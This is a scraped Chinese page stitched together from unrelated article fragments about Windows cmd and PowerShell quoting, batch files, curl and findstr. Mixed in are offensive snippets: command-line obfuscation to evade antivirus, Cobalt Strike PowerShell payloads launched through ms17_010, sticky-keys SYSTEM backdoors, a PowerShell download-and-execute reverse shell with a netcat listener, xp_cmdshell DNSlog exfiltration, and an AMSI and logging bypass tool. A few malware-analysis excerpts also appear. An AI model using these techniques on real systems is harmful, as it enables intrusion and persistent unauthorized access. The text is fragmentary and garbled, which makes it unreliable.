里的 ls 和 ll# 显示当前目录下文件,注意这个命令是 linux 里的,在 windows 的 PowerShell 里可以用,cmd 小黑窗里不可以用ls# 显示当前目录下文件详细信息,相当于...,如查找网络:netstat -ant |find "192.168.2"注意: 1. find命令中要查找的字符串要用"双引号"括起来 2....双引号前面需加上转义符 `,否则可能会报错:FIND: 参数格式不正确重定向输出符号 > >>命令 > 文件:将标准输出重定向到文件中(清除原有文件中的数据)命令 >> 文件:将输出重定向到文件中(在原有内容后面追加...# echo [] 指定要在屏幕上显示的文本# echo [on | off] 打开或关闭命令回显功能,默认情况下,命令回显处于启用状态# @echo off 防止批处理文件中的所有命令...(包括 echo off 命令) 在屏幕上显示在批处理文件类型的第一行echo 123网络相关ipconfig显示所有当前的 TCP/IP 网络配置值,并刷新动态主机配置协议 (DHCP) 和域名系统
命令行通常是杀软检测比较严格的地方,比如一些被滥用的命令就会被杀软重点关注,比如:rundll32、powershell、certutil等等。...当我们使用命令行混淆时,可以适当的规避某些杀软的检测规则,达到我们执行命令的目的。...双引号 双引号没有什么特殊的含义,它可以帮助文件或目录保持一个整体,而不会被中间的空格所切割。 一个简单的例子就是目录名中间有空格。 ? 用法即是我们可以在敏感文件名、命令中间添加空格。 ?...转义符 转义符(^)也可以做为切割文件名的一个符号,但是该符号不能够连续输入。 ? 转义符也可以作为一个换行 ? 垃圾分隔符 先来了解一下管道,通过管道结合cmd我们可以执行前者。...\”) do %g 从”c:\windows\system32\powershell”中以反斜杠为分隔符,提取第四列的字符串并执行。
总结和反思: 1. win中执行powershell的远程代码下载执行注意双引号转义 2....对powershell代码先转为windows上默认的Unicode编码方式(UTF-16LE)再转为base64执行,防止代码内容被破坏 3. 学会查CVE漏洞 4....这里需要注意的时,因为文件名之间包含空格,cd的时候需要用双引号包括住文件夹的名称 把配置文件都进行下载 ?...然后靶机远程下载代码执行 刚开始我构造的语句是这也的,但是python那边一直没有下载的提示 ? 把双引号进行转义即可,成功 ?...虽然代码被下载了了,但是没有执行成功,可能也是因为脚本代码内容没有被转义导致无法正常执行 ? 我们把代码进行转义 ?
'、"单双引号的问题,这时我们得在引号前边加上一个\反斜杠进行转义即可,360没有拦截,如下图所示。...Cobaltstrike生成一个Powershell Command的Payload,删除无用内容,保留双引号的内容即可,然后再将这个Payload.txt放在Web目录下用于远程调用执行,如下图所示。...ms17_010_command模块设置command参数为我们要执行的Powershell命令,注意要用\反斜杠转义下单双引号,执行exploit虽然有报错,但是已经成功上线了,如下图所示。...我们也可以将以上Powershell命令稍微改下,不直接执行Payload上线,而是改为可绕过360进行文件下载落地的命令,将免杀木马下载落地到磁盘,执行也都会出现报错,如下图所示。...注:我们在Metasploit的某些模块下执行命令时如果带有'、"单双引号可能会被过滤掉,需要在引号前边加上一个\反斜杠进行转义才行,路径也不能用\,要用\\。
微软原版从Server2019才开始有curl.exe的,Server2019以前的系统里如果有curl.exe肯定是人为集成的,如果集成的curl.exe版本较低,curl.exe https url...时可能会报证书错误,详见我这篇文档:https://cloud.tencent.com/developer/article/2396655 windows curl命令官网:https://curl.haxx.se...安装后需要添加环境变量 Windows curl跟Linux curl在引号的处理上稍有区别 Windows上curl post json请求格式跟linux上不一样,linux要用单引号,Windows要用双引号且里面的双引号要转义...另外,请注意,高版本Windows的powershell有curl缩写,如果你直接在powershell里敲curl调用的是系统本身的那个命令,要调用你安装的curl的话就指定绝对路径吧,注意不要省略...我之前写powershell代码时就踩过坑,后来我学乖了在curl后面加了.exe(我配环境变量了,所以省去了绝对路径),避免跟powershell里的curl缩写冲突。
findstr中正则表达式用法规则小结 ● 行首行尾规则 如"^rem"、"bat$" 表示从行首匹配rem、从行尾匹配bat。 ○ 行首行尾可以是英文、数字,还可以是汉字。...符号 \ 为转义符。...● 转义符 \ 把表达式中的特殊字符(元字符)转化为普通字符。但不能对双引号" 和大于号 > 转义。...\是转义符号,使句点.不再是通配符,而是文件拓展名中的点。用于表达式 的 关键字查询,在这里是列举后缀是bat的批处理文件。...如果是带空格的字符串 ,要用双引号引起来,而且要用参数/C:"string1 string2" findstr . 2.txt 或 Findstr "." 2.txt ○ 从文件2.txt中查找任意字符
,可以直接以System权限执行系统命令、创建管理员用户、登录服务等同时,当我们在权限维持时,如果留下了粘滞键后门,当用户修改密码后,我们在远程连接时可能会出现无法登录的情况,这时候上面这种后门进行权限维持就比较有用了..."shift"按键,可以成功弹出命令行界面:批处理文件1我们也可以通过批处理文件logon_backdoor(https://github.com/szymon1118/logon_backdoor )...\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe之后五次shift,成功执行cmd:批处理文件2与批处理文件...1方式类似,Sticky-Keys项目(https://github.com/HanKooR/Sticky-Keys )提供了一个额外的选项,把系统控制台给用户,该工具的使用较为简单,下载批处理文件之后下目标主机执行即可虽然执行时可能会有一些小错误...,但是执行结果没有任何问题,我们可以按下5次shift来调用命令行:
之后连续按下5次"Shift"键,之后将弹出命令执行窗口,可以直接以System权限执行系统命令、创建管理员用户、登录服务等 ?...之后在目标主机中连续五次shift即可执行SYSTEM权限的命令行,这在RDP远程登录用户密码已被修改的情况下很有用~ ?...之后执行五次"shift"按键,可以成功弹出命令行界面: ?...,下载批处理文件之后下目标主机执行即可 ?...虽然执行时可能会有一些小错误,但是执行结果没有任何问题,我们可以按下5次shift来调用命令行: ?
0x02 交互与非交互SHELL区别 交互式SHELL:命令终端有与用户进行交互,会等待用户输入命令后立即执行,有回显,如:登录、退出、可执行文件或系统中的一些命令,这里以下边的这个批处理文件为例来进行测试...pause > nul 非交互式SHELL:命令终端没有与用户进行交互,而是读取文件中的命令来执行,当执行完成后即退出SHELL,并没有回显,如:Webshell大马和中国菜刀的虚拟终端里执行这个批处理文件...获取交互式SHELL的方式: 我们可以在Kali里用Netcat工具执行监听,然后再去目标主机上通过Powershell执行powercat.ps1脚本反弹得到一个交互式SHELL,也可以通过Meterpreter...攻击机执行: root@kali:~# netcat -lvvp 9527 受害机执行: powershell IEX (New-Object Net.WebClient).DownloadString...但有时在执行命令时可能会出现两个“拒绝访问”的情况,这可能是cmd被降权或系统安全设置造成,可尝试将我们上传到可读写目录中的提权EXP放在cmd.exe位置上去执行,也可以尝试用“”双引号将提权EXP括起来后再执行
关于z9 z9是一款功能强大的PowerShell恶意软件检测与分析工,该工具可以帮助广大研究人员从PowerShell日志的事件记录中检测基于PowerShell实现的恶意软件组件。...参数解析: 参数命令 命令介绍 input file 要分析的PowerShell文件路径 -o output json 存储z9分析结果的文件名 -s 执行静态分析 --utf8 当输入文件编码为UTF...-8时需要指定该参数 --no-viewer 不打开查看器 命令参考样例: python z9.py malware.ps1 -o sample1.json -s (向右滑动,查看更多) 如何准备...; 2、重启PC; 3、所有的PowerShell执行此时都会在事件日志中被记录; 将事件日志转储为XML 1、执行该批处理文件:https://github.com/Sh1n0g1/z9/blob/main.../util/collect_psevent.bat; 2、XML文件将会在util/log目录中被创建; 3、z9工具支持解析这些XML文件; 删除现有的事件日志 以“管理员权限“执行该批处理文件:https
26for+/F+%i+in+('type+temp2')+do+ping+-n+1+%i.dnslog 执行以下命令时得注意多个单双引号的闭合问题,外边用双引号,里边就用单引号,外边用单引号,里边就用双引号...(4) 查看杀软进程 执行以下命令可以将目标主机正在运行的进程列表给外带出来,在确定没有安全防护软件的情况下可以直接将CS/MSF文件落地到磁盘执行上线,不过也得注意上边提到的cmd /c、| 转义和空格等问题...(9) 问题解决方案 本地测试时突然想到去看下Sqlmap的xp_cmdshell执行命令数据包,使用declare函数来进行注入的,支持Hex和Ascii码(GB2312)。...利用这种方式可以完美解决我们在上边测试中所遇到的一些问题,如:空格、|和转义、& URL编码、单双引号、set/for命令拼接执行等等。 /sql.aspx?...实战中还得根据自己所遇到的场景选择更为简单高效的方式来获取目标主机权限,如:能出网时直接远程执行上线,有防护时再免杀落地上线,不出网时再写入Webshell等,更多相关文章可以去看我之前写的。
点击上方“AirPython”,选择“置顶公众号” 第一时间获取 Python 技术干货! 大家好,我是安果!...1、CMD 具体步骤如下: 1-1 创建一个批处理文件 比如:在系统的用户目录创建一个批处理文件 alias.bat 1-2 在批处理文件中,定义别名 使用关键字「 doskey 」定义别名,$*...别名,只需要更新批处理文件 alias.bat,然后重新启动 CMD 命令窗口即可以生效 2、PowerShell 通过测试,我们发现在 CMD 中定义的 Alias 并不能在 PowerShell 中使用...所以我们需要针对 PowerShell 另外设置 Alias 具体步骤如下: 2-1 找到配置文件绝对路径 在 PowerShell 控制台中,输入命令「 echo $profile 」获取配置文件的完整路径...open(){ explorer . } 2-3 重启 PowerShell 并使用 为了使编写的 Alias 生效,我们需要重启 PowerShell 后再使用 2-4 参数化 在定义别名时
这个.bat/.cmd格式的批处理文件可以直接通过windows自带的记事本或者是其他的文本编辑编辑即可。如下图为一个简单的bat批处理文件,以及直接在系统中双击运行测试的结果。...可以说cmd能执行的功能在PowerShell都能实现的,但是用powershell里能执行的功能在cmd中不一定能实现。...通过PowerShell编写完xxx.ps1的脚本文件后,就可以通过FTViewSE中命令向导中选择ScriptExecute去执行在FTVIEWSE中脚本选项中保存的脚本即可执行这个脚本。...具体的使用方法也比较的简单容易啊,基本上就是根据提示下一步下一步的点然后输入一些信息就可以了,然后到了install program这里选择install program时选择使用cmd.exe然后来打开之前创建的....bat批处理文件。
将你的Powershell脚本隐藏在目标下!...Invisi-Shell通过与.Net程序集挂钩,绕过了所有Powershell的安全特性(脚本块记录、模块记录、转录、AMSI)钩子是通过CLR Profiler API进行的。...该代码仅适用于x64进程,并在Powershell V5.1下进行了测试。...使用方法 将编译好的InvisiShellProfiler.dll与根目录下的两个批处理文件(RunWithPathAsAdmin.bat & RunWithRegistryNonAdmin.bat)从.../x64/Release/文件夹复制到同一文件夹 运行其中一个批处理文件(取决于你是否有本地管理员权限) Powershell控制台将运行使用exit命令(不要关闭窗口)退出powershell,让批处理文件进行适当的清理
目前Windows中的批处理包含两类:Windows DOS (BAT) 批处理和 PowerShell 批处理 DOS 批处理:基于Windows DOS命令的,用来自动地批量地执行DOS命令以实现特定操作的脚本...好,开始进入正题吧,从入门到加薪!...rem echo 我是注释不执行1 :: echo 我是注释不执行2 == echo 我不是注释要执行 @pause call :调用另一个批处理文件 描述: 使用call命令调用其他批处理文件,如果不用...call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令,温馨提示:同一目录可以不加路径。...pause timeout :脚本延迟执行 描述: 此命令主要用于脚本延迟执行,其类似于PowerShell中的sleep方法以及Linux中sleep命令。
在调查过程中,研究人员发现文件被命名为 PaymentAdv.one: 钓鱼文档 使用 OneNoteAnalyzer 分析该文件后,攻击时通过释放并执行名为 zoo1.bat 的批处理文件进行的:...提取的恶意文件 批处理文件经过混淆,并且包含一个加密的数据块,随后是高度混淆的 PowerShell 代码。...混淆的批处理文件 研究人员解析文件,如下所示: 执行的命令 日志显示批处理文件复制并伪装恶意样本名为 zoo1.bat.exe,以试图隐藏其活动。...HTA 文件执行 执行进程树 下载并执行 PowerShell 脚本,会下载 Cobalt Strike 的 DLL 文件。...Qakbot OneNote 混淆 最新的 OneNote Qakbot 样本改变了它们的执行流程,从 HTA 改用 CMD 命令。
二.Powershell条件语句 1.if条件判断 if-elseif-else条件判断,执行操作用大括号表示。 ? ? 注意,if-else中间可以增加新的判断elseif,如下所示: ? ?...数组也可以是一个变量或命令,此时它仍然是一个数组。 ? ? 2.访问数组 首先定义一个多钟类型的数组。 ? ? 访问数组特定元素,第一个元素,获取两个元素,获取最后一个元素。 ? ?...六.Powershell字符串及交互 1.定义文本及转义字符 表达式中可以定义只,如下所示。同时,单引号和双引号可以相互嵌套,这和JAVA、PHP、Python中的变量套接类似。 ?...在Powershell中,转义字符不再是斜杠(\)而是(`),如下所示。 `n 换行 `r 回车符 `t tab键 `b 退格符 `’ 单引号 ? ? ?...随后推出的Windows NT是第一个从系统级别广泛使用注册表的操作系统。
在监控我们的安全邮件网关云服务时,我们发现了多个针对巴西用户的可疑的垃圾邮件。接下来,我们就给大家分析一下这个使用BAT文件来实施攻击的巴西恶意软件样本。...使用PowerShell命令,并下载一个PowerShell脚本以及PShellExec.exe; ? 3....最后,它会创建一个VBScript脚本,并执行加密后的PowerShell脚本。为了实现持久化感染,它还会在目标系统的启动目录STARTUP文件夹中创建一个符号链接; ?...分析PowerShell脚本 乍看之下,这个脚本貌似参考的是Matthew Graeber之前所开发的PowerShell脚本,即PowerSyringe,一个基于PowerShell的代码/DLL...下面是攻击者在覆盖屏幕时所使用的伪造银行主页以及表单: 1. Banrisul ? 2. ItaúUnibanco ? 3. Bancodo Nordeste ? 4.
在 Windows 10 上,批处理文件是一种特殊的文本文件,通常具有。Bat 扩展,它包含一个或多个命令,命令提示符可以理解并依次运行以执行各种操作。...通常情况,你可以手动键入命令以执行特定任务或更改 Windows 10 上的系统设置。然而,批处理文件简化了重新输入命令的工作,节省了时间和避免了可能出现的不可逆转的错误。...你还可以使用 PowerShell 等其他工具编写更高级的脚本。然而,当你需要运行命令来改变设置、自动化例程、启动应用程序或启动网站时,使用带有命令提示符的批处理文件是一个方便的选择。...启动时运行批处理文件 如果你希望每次登录到 Windows 10 帐户时执行一系列命令,你可以将脚本放在启动文件夹中以保存额外的步骤,而不是使用任务计划程序。...(或单击粘贴快捷方式以创建批处理文件的快捷方式。) 重启电脑 完成这些步骤后,每次登录到 Windows 10时,批处理文件将执行并运行所包含的命令。
领取专属 10元无门槛券
手把手带您无忧上云